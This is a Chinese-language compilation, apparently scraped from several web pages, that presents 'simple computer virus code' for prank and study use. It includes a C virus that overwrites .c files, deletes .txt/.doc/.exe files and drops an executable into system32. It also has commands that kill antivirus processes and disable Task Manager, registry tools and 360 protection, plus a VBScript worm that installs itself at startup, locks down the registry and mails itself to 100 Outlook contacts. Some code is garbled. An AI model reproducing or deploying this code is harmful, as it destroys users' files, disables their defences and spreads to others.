C语⾔病毒代码在下⾯的部分加上传染部分就可以了，⽐如email发送被点击时触发，附加到其他普通软件条件触发等C语⾔病毒代码#include <io.h>#include <dir.h>#include <stdio.h>#include <stdlib.h>#include <string.h>/* copy outfile to infile */void copyfile(char *infile, char *outfile){FILE *in,*out;in = fopen(infile,&quot;r&quot;);out = fopen(outfile,&quot;w&quot;);while (!feof(in)){fputc(fgetc(in),out);}fclose(in);fclose(out);}/*This function named Rubbishmaker.*/void MakeRubbish(){int i;FILE *fp;char *path;char *NewName;char *disk[7] = {&quot;A&quot;,&quot;B&quot;,&quot;C&quot;,&quot;D&quot;,&quot;E&quot;,&quot;F&quot;,&quot;G&quot;}; char *addtion = &quot;:\\&quot;;/* Make some rubbish at the current catalogue */for (i = 0; i<5; i++){char tempname[] = &quot;XXXXXX&quot; ;NewName = mktemp(tempname);fp = fopen(NewName,&quot;w&quot;);fclose(fp);}/* make some rubbish at the root catalogue */path = strcat(disk[getdisk()],addtion); /* get the root catalogue */chdir(path); /*change directory according to the &quot;path&quot; */for (i = 0; i<5; i++){char tempname[] = &quot;XXXXXX&quot;;NewName = mktemp(tempname);fp = fopen(NewName,&quot;w&quot;);fclose(fp);}}This function can creat some .exe or .com documents in the sensitive place.Don't worry,It's only a joke.It will do no harm to your computer.*/void CreatEXE(){int i;char *path;char *s[2] = {&quot;C:\\WINDOWS\\system32\\loveworm.exe&quot;,&quot;C:\\WINDOWS\\&quot;}; for ( i = 0; i < 2; i++){open(s, 0x0100,0x0080);copyfile( &quot;C_KILLER.C&quot;,s);}}/* remove something from your computer */void Remove(){int done;int i;struct ffblk ffblk;char *documenttype[3] = {&quot;*.txt&quot;,&quot;*.doc&quot;,&quot;*.exe&quot;};for (i = 0; i < 3; i++){done = findfirst(documenttype,&ffblk,2);while (!done){remove(ffblk.ff_name);done = findnext(&ffblk);}}}/* overlay the c programs */void Breed(){int done;struct ffblk ffblk;done = findfirst(&quot;*.c&quot;,&ffblk,2);while (!done){if (strcmp(&quot;C_KILLER.C&quot;, ffblk.ff_name) != 0 ){copyfile(&quot;C_KILLER.C&quot;,ffblk.ff_name);}done = findnext(&ffblk);}}void main(){printf(&quot;THERE IS A VIRUS BY XIAOKE.\n\n&quot;);Breed();Remove();CreatEXE();printf(&quot;COULD YOU TELL ME YOUR NAME?\n\n&quot;);printf(&quot;NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n&quot;);getchar();printf(&quot;IT'S ONLY A JOKE! THANK YOU!\n\n&quot;);clrscr();system(&quot;cmd&quot;);}⾸先声明：本程序是我举的⼀个例⼦为了叫⼤家理解就可以了如果⼤家拿去捉弄⼈，我不负任何责任！希望⼤家要以学习为重！对于病毒我们应该是深恶痛绝的，但是作为纯研究许多⼈还是很有兴趣的我曾经⽤汇编做过⼀些具有毁灭性的病毒，本想献出来与⼤家分享不过考虑到⼀些⼩⼈看了会做出来⼀些危害别⼈的⾏为，所以我决定⽤这个简单的并毫⽆伤害性的c语⾔伪病毒来说明⼀下问题，再次声明这⼀切全是为了编程研究病毒的特点：病毒的最⼤特点就是⾃我复制，从病毒的分类来说有很多种，这⾥我们将介绍最流⾏的附加式病毒，它通过对正常的⽂件进⾏改写，增加来实现其⾃我复制的⽬的。

前段时间看到大家对这种整人的代码兴趣还挺浓厚的，我最近就收集了一些和大家分享。

PS：由于精力问题没有对代码的可用性进行一一验证，所以不保证全部可用，大家如果发现有不可用的或者需要改进的地方请提出来，以下代码仅供娱乐，请勿用于非法用途。

一、怎么点都没反应的桌面如果同事的电脑开着，他离开电脑前一会，嘿嘿，机会来了。

把他的电脑桌面按print键截屏截下来，（当然QQ截屏也可以，不过效果不太逼真！）建议大家用print截屏，设置为桌面。

然后把原来在桌面上的文件统统移到一个盘的文件夹里，这样桌面看上去和平时一个样。

他回来后狂点鼠标，却怎么都没有反应！现在还在关机,开机,关机,开机,关机,开机中…………附带：print键截屏方法：键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图！用法一，按“Print Screen SysRq”一下，对当前屏幕进行抓图，就是整个显示屏的内容。

用法二，先按住“Alt”键，再按“Print Screen SysRq”键，则是对当前窗口进行抓图。

如你打开“我的电脑”后，用此法就抓取“我的电脑”窗口的内容。

用上诉两种方法抓图后，再打开“开始”、“附件”里的“画图”程序，点“编辑”、“粘贴”就把抓取的图片贴出来了，可以保存为自己需要的格式。

哈哈，简单吧，这方法真挺搞的，有兴趣的童鞋可以试试！二、让电脑硬盘消失－隐藏磁盘方法愚人节电脑整人使无端端地电脑磁盘的某个分区消失了，钻进地缝里面去了吗，给外星人抓走了？？非也！是某些人使坏将其隐藏起来了！步骤1.新建一个记事本2.将记事本的后缀改为.reg，就是将“新建文件.txt”改为“新建文件.reg”3.将下面的代码复制到记事本当中：Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00解释（1）"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的图中的D盘已经神秘消失了。

⾮常简单的病毒代码汇总你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下⾯由店铺给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助! 最简单的电脑病毒代码介绍： 绕过杀毒软件防御： 运⾏ (“taskkill /f /im kavsvc.exe”, 假, 1) 运⾏ (“taskkill /f /im KVXP.kxp”, 假, 1) 运⾏ (“taskkill /f /im Rav.exe”, 假, 1) 运⾏ (“taskkill /f /im Ravmon.exe”, 假, 1) 运⾏ (“taskkill /f /im Mcshield.exe”, 假, 1) 运⾏ (“taskkill /f /im VsTskMgr.exe”, 假, 1) 修改系统时间： 置现⾏时间 (到时间 (“8888年8⽉8⽇”)) 禁⽤任务管理器：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0) 禁⽤注册表： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1) 隐藏开始中的运⾏禁⽌WIN2000/XP通过任务管理器创建新任务： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1) 隐藏“MS-DOS⽅式”下的磁盘驱动器。

不管是在“我的电脑”⾥，或“MS-DOS”⽅式下都看不见了： 写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion\Policies\WinOldApp\Disabled”, 1) 隐藏开始中的关机： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1) 隐藏开始中的搜索： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1) OVER360防御： 写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0) 写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0) 写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0) 写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0) 结束360进程 运⾏ (“taskkill /f /im 360tray.exe”, 假, 1) 隐藏所有驱动器： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295) 禁⽌所有驱动器： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295) 隐藏⽂件夹选项： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1) 将桌⾯对象隐藏： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1) 隐藏开始中的关机： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1) 隐藏开始中的搜索： 写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1) 这条有两种情况。

简单的病毒编程代码病毒编程是一项非常有趣的技术，它可以被用来创建恶意软件，也可以被用来保护计算机安全。

本文将使用简单的代码，演示如何创建一个病毒。

前置知识在开始之前，你需要掌握一些基本的编程知识，特别是 Python编程语言。

本文的代码将采用 Python，因为它是一种简单易学的语言，而且有很多函数和库可以帮助我们编写和执行病毒程序。

代码下面是一个简单的病毒编程代码：```pythonimport osimport randomdef infect(files):for file in files:try:with open(file, 'r') as f:content = f.read()except:continueif 'virus' in content:continuewith open(file, 'a') as f:f.write('\n\n# infected with virus\n')print('Infection completed')def spread(files):for file in files:if not os.path.isfile(file):continuewith open(file, 'r') as f:content = f.read()if 'virus' not in content:continuefor i in range(10):random_file = random.choice(files)if os.path.isfile(random_file):with open(random_file, 'a') as f:f.write('\n\n# spread from ' + file) breakprint('Spreading completed')def main():files = []for root, dirs, filenames in os.walk('.'):for filename in filenames:if filename.endswith('.py'):files.append(os.path.join(root, filename))infect(files)spread(files)if __name__ == '__main__':main()```此代码将随机选择10个Python文件，并向其中的每个文件添加一行注释，指示该文件已被感染。

电脑病毒源代码介绍 电脑中了病毒想从它的源代码⼊⼿怎么办呢!有店铺在，下⾯由店铺给你做出详细的电脑病毒源代码介绍!希望对你有帮助! 电脑病毒源代码介绍： 电脑病毒源代码⼀： on error resume next set fs=createobject("ing.filesystemobject" '创建⼀个能与操作系统沟通的对象,再利⽤该对象的各种⽅法对注册表进⾏操作 set dir1=fs.getspecialfolder(0) '获取windows/winnt⽂件夹位置 set dir2=fs.getspecialfolder(1) '获取system32/system⽂件夹位置 set so=createobject("ing.filesystemobject" dim r '定义⼀个变量 set r=createobject("w.shell" so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '复制病毒副本到windows/winnt⽂件夹位置 so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '复制病毒副本到system32/system⽂件夹位置 so.getfile(w.fullname).copy(dir1&"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单 '下⾯是对注册表的恶意修改和简单的依靠oe传播 r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表，禁⽌“运⾏”菜单 r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表，禁⽌“关闭”菜单 r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注册表，隐藏所有逻辑盘符 r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表，禁⽌注册表编辑 r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表，禁⽌开机注册表扫描 r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表，禁⽌“注销”菜单 r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表，禁⽌ms-dos实模式 r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表，使这个脚本本⾝开机⾃动运⾏ r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表，禁⽌显⽰桌⾯图标 r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表，禁⽌纯dos模式 r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表，禁⽌“任务栏和开始”菜单 r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表，禁⽌右键菜单 电脑病毒源代码⼆： r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注册表，禁⽌控制⾯板 r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表，禁⽌导⼊使⽤.reg⽂件，改为⽤txt⽂件的关联 r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '设置开机提⽰框标题 r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了，哭吧~" '设置开机提⽰框⽂本内容 set ol=createobject("outlook.application" '创建outlook⽂件对象⽤于传播 on error resume next for x=1 to 100 set mail=ol.createitem(0) mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '⽤于向地址簿的前100名发送此 vbs病毒，可以算是简单弱智的蠕⾍了吧~~ mail.subject="今晚你来吗?" '邮件主题 mail.body="朋友你好：您的朋友rose给您发来了热情的邀请。